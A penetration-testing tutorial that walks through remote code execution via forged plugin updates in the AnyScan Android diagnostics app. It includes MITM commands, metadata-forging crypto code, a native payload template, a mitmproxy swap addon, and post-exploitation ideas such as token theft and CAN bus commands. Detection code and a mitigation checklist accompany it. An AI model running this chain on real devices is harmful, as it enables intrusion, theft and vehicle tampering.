Insecure In-App Update Mechanisms – Remote Code Execution via Malicious Plugins

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Many Android applications implement their own “plugin” or “dynamic feature” update channels instead of using the Google Play Store. When the implementation is insecure, an attacker able to intercept the traffic can supply arbitrary native code that will be loaded inside the app process, leading to full Remote Code Execution (RCE) on the handset – and in some cases on any external device controlled by the app (cars, IoT, medical devices …).

This page summarises a real‐world vulnerability chain found in the Xtool AnyScan automotive-diagnostics app (v4.40.11 → 4.40.40) and generalises the technique so you can audit other Android apps and weaponise the mis-configuration during a red-team engagement.


1. Identifying an Insecure TLS TrustManager

  1. Decompile the APK with jadx / apktool and locate the networking stack (OkHttp, HttpURLConnection, Retrofit…).
  2. Look for a custom TrustManager or HostnameVerifier that blindly trusts every certificate:
```java
public static TrustManager[] buildTrustManagers() {
    return new TrustManager[]{
        new X509TrustManager() {
            public void checkClientTrusted(X509Certificate[] chain, String authType) {}
            public void checkServerTrusted(X509Certificate[] chain, String authType) {}
            public X509Certificate[] getAcceptedIssuers() {return new X509Certificate[]{};}
        }
    };
}
```
  3. If present, the application will accept any TLS certificate → you can run a transparent MITM proxy with a self-signed cert:
```bash
mitmproxy -p 8080 -s addon.py  # see §4
iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080  # on rooted device / emulator
```
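For auditors, step 2 can be automated over a decompiled source tree. The following is an added example, not code from the original page or from any tool it names: a regex heuristic that flags empty checkServerTrusted bodies and HostnameVerifier.verify() implementations that always return true. The names audit_source and audit_tree and both sample snippets are constructed for this illustration.

```python
import re
from pathlib import Path

COMMENT = re.compile(r"//[^\n]*|/\*.*?\*/", re.S)
RULES = {
    "trust-all X509TrustManager (empty checkServerTrusted)": re.compile(
        r"void\s+checkServerTrusted\s*\([^)]*\)\s*(?:throws\s+[\w.,\s]+?)?\s*"
        r"\{\s*(?:return\s*;\s*)?\}"),
    "HostnameVerifier.verify() always returns true": re.compile(
        r"boolean\s+verify\s*\(\s*String\s+\w+\s*,\s*SSLSession\s+\w+\s*\)\s*"
        r"\{\s*return\s+true\s*;\s*\}"),
}

def audit_source(name, source):
    """Return sorted (file, line, rule) tuples for one Java source string."""
    # Blank out comments but keep newlines, so line numbers stay correct and
    # jadx remarks such as "@Override // javax.net.ssl..." do not break a match.
    code = COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), source)
    hits = []
    for rule, pattern in RULES.items():
        for m in pattern.finditer(code):
            hits.append((name, code.count("\n", 0, m.start()) + 1, rule))
    return sorted(hits)

def audit_tree(root):
    """Scan every .java file under a decompiler output directory."""
    hits = []
    for path in Path(root).rglob("*.java"):
        hits += audit_source(str(path), path.read_text(errors="replace"))
    return hits

# Constructed samples: the trust-all pattern from this page, and a manager
# that delegates to the platform default (must not be flagged).
SAMPLE_BAD = """\
new X509TrustManager() {
    public void checkServerTrusted(X509Certificate[] chain, String authType) {}
    public X509Certificate[] getAcceptedIssuers() {return new X509Certificate[]{};}
};
HostnameVerifier hv = new HostnameVerifier() {
    @Override // javax.net.ssl.HostnameVerifier
    public boolean verify(String hostname, SSLSession session) {
        return true;
    }
};
"""
SAMPLE_OK = """\
public void checkServerTrusted(X509Certificate[] c, String a) throws CertificateException {
    defaultTm.checkServerTrusted(c, a);
}
"""
```

A hit is a lead for manual review, not proof: confirm that the flagged manager or verifier is actually installed on the client that talks to the update endpoint.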

2. Reverse-Engineering the Update Metadata

In the AnyScan case each app launch triggers an HTTPS GET to:

https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx

The response body is an XML document whose <FileData> nodes contain Base64-encoded, DES-ECB encrypted JSON describing every available plugin.

Typical hunting steps:

  1. Locate the crypto routine (e.g. RemoteServiceProxy) and recover:
    • algorithm (DES / AES / RC4 …)
    • mode of operation (ECB / CBC / GCM …)
    • hard-coded key / IV (often 56-bit DES keys or 128-bit AES keys in constants)
  2. Re-implement the function in Python to decrypt / encrypt the metadata:
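```python
from Crypto.Cipher import DES  # PyCryptodome
from base64 import b64decode, b64encode

# 56-bit key observed in AnyScan. ECB mode takes no IV, so IV is unused below.
# DES.new() expects the key as 8 bytes (56 key bits plus parity bits); the
# constant is reproduced here as published.
KEY = IV = b"\x2A\x10\x2A\x10\x2A\x10\x2A"

def decrypt_metadata(data_b64: str) -> bytes:
    cipher = DES.new(KEY, DES.MODE_ECB)
    return cipher.decrypt(b64decode(data_b64))

def encrypt_metadata(plaintext: bytes) -> str:
    cipher = DES.new(KEY, DES.MODE_ECB)
    padded_len = (len(plaintext) + 7) // 8 * 8  # zero-pad to the 8-byte DES block size
    return b64encode(cipher.encrypt(plaintext.ljust(padded_len, b"\x00"))).decode()
```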

3. Craft a Malicious Plugin

  1. Pick any legitimate plugin ZIP and replace the native library with your payload:
```c
// libscan_x64.so – constructor runs as soon as the library is loaded
#include <android/log.h>  // __android_log_print
#include <unistd.h>       // getuid

__attribute__((constructor))
void init(void){
    __android_log_print(ANDROID_LOG_INFO, "PWNED", "Exploit loaded! uid=%d", getuid());
    // spawn reverse shell, drop file, etc.
}
```
```bash
$ aarch64-linux-android-gcc -shared -fPIC payload.c -o libscan_x64.so
$ zip -r PWNED.zip libscan_x64.so assets/ meta.txt
```
  2. Update the JSON metadata so that "FileName" : "PWNED.zip" and "DownloadURL" points to your HTTP server.
  3. DES-encrypt + Base64-encode the modified JSON and copy it back inside the intercepted XML.

4. Deliver the Payload with mitmproxy

addon.py example that silently swaps the original metadata:

```python
from mitmproxy import http

with open("fake_metadata.xml", "rb") as fh:
    MOD_XML = fh.read()

def request(flow: http.HTTPFlow) -> None:
    # flow.request.path is a str, so it is matched against a str literal
    if "/UpgradeService.asmx/GetUpdateListEx" in flow.request.path:
        flow.response = http.Response.make(
            200,
            MOD_XML,
            {"Content-Type": "text/xml"}
        )
```

Run a simple web server to host the malicious ZIP:

```bash
python3 -m http.server 8000 --directory ./payloads
```

When the victim launches the app it will:

  • fetch our forged XML over the MITM channel;
  • decrypt & parse it with the hard-coded DES key;
  • download PWNED.zip → unzip inside private storage;
  • dlopen() the included libscan_x64.so, instantly executing our code with the app’s permissions (camera, GPS, Bluetooth, filesystem, …).

Because the plugin is cached on disk the backdoor persists across reboots and runs every time the user selects the related feature.

5. Post-Exploitation Ideas

  • Steal session cookies, OAuth tokens, or JWTs stored by the app.
  • Drop a second-stage APK and silently install it via pm install (the app already has REQUEST_INSTALL_PACKAGES).
  • Abuse any connected hardware – in the AnyScan scenario you can send arbitrary OBD-II / CAN bus commands (unlock doors, disable ABS, etc.).

Detection & Mitigation Checklist (blue team)

  • NEVER ship a production build with a custom TrustManager/HostnameVerifier that disables certificate validation.
  • Do not download executable code from outside Google Play. If you must, sign each plugin with the same apkSigning v2 key and verify the signature before loading.
  • Replace weak/hard-coded crypto with AES-GCM and a server-side rotating key.
  • Validate the integrity of downloaded archives (signature or at least SHA-256).
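The last checklist item, written as a gate that runs before a plugin archive is unpacked or loaded. This is an added example, not the app's or the page's code: FileName and DownloadURL are the metadata fields named above, while the host plugins.example.com, the pinned-digest table and verify_plugin are assumptions made for this illustration. The table is assumed to ship inside the signed APK, so a forged metadata response cannot rewrite it; a detached signature checked against a public key embedded in the app would sit at the same point in the flow.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumption: both tables are compiled into the signed APK, so their trust is
# rooted in the app signature and not in the update channel. Values constructed.
ALLOWED_HOSTS = {"plugins.example.com"}
PINNED_SHA256 = {
    "scan.zip": hashlib.sha256(b"constructed legitimate plugin bytes").hexdigest(),
}

class PluginRejected(Exception):
    """Raised when a downloaded plugin must not be unpacked or loaded."""

def verify_plugin(meta, archive):
    """Return the archive's SHA-256 if the plugin may be used, else raise."""
    # 1. The metadata may be forged, so the download origin is checked against
    #    a list the app carries itself: HTTPS only, expected host only.
    url = urlsplit(meta["DownloadURL"])
    if url.scheme != "https" or url.hostname not in ALLOWED_HOSTS:
        raise PluginRejected("download URL outside the pinned HTTPS origin")
    # 2. The expected digest comes from the app, never from the metadata.
    expected = PINNED_SHA256.get(meta["FileName"])
    if expected is None:
        raise PluginRejected("no pinned digest for " + meta["FileName"])
    # 3. Hash the bytes that were actually downloaded and compare.
    actual = hashlib.sha256(archive).hexdigest()
    if not hmac.compare_digest(actual, expected):
        raise PluginRejected("archive digest mismatch")
    return actual
```

Run the check on the exact bytes that will be unpacked, and re-run it on the cached copy before every load so a plugin modified on disk is rejected as well.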
